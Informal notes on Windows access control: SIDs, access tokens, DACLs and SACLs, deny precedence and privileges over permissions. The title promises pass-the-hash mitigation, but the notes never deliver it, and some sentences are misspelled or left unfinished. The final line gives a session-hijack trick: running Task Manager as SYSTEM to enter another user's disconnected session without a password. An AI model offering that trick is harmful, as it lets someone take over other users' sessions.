tips for securing environment

 1. Pass the hash mitigation:

All windows services have their own SIDs, that can be used to provide access to internal resources

Access tokens are viewed with "whoami /all", this consists of SID, group membership and priviliged (not matter if those are in disabled state)

Security descriptor is a lock (as opposed to access tokens), those define who has access to which resource, it cotains DACL (actual permision list) and SACL (auditing info) and ownership info.

DACL is managed by someone who have a "Full Controll" permissions, SACL can be managed only by someone who has a user privilige (usually means belonging to local admin group)

Rule sets are read from top down and inherted have lower priority than local:

Deny always wins if this set by a group as opposed to inherited permissions.

Priviliges always beat permissions.

Even if a domain admin set a DENY permission on "take ownership" permission for a local admin, because of this privilige "Take ownership of files and other objects"

Tip for connecting to a user session that is disconnected: start taskmgr as SYSTEM and connect, you will not be asked for a password.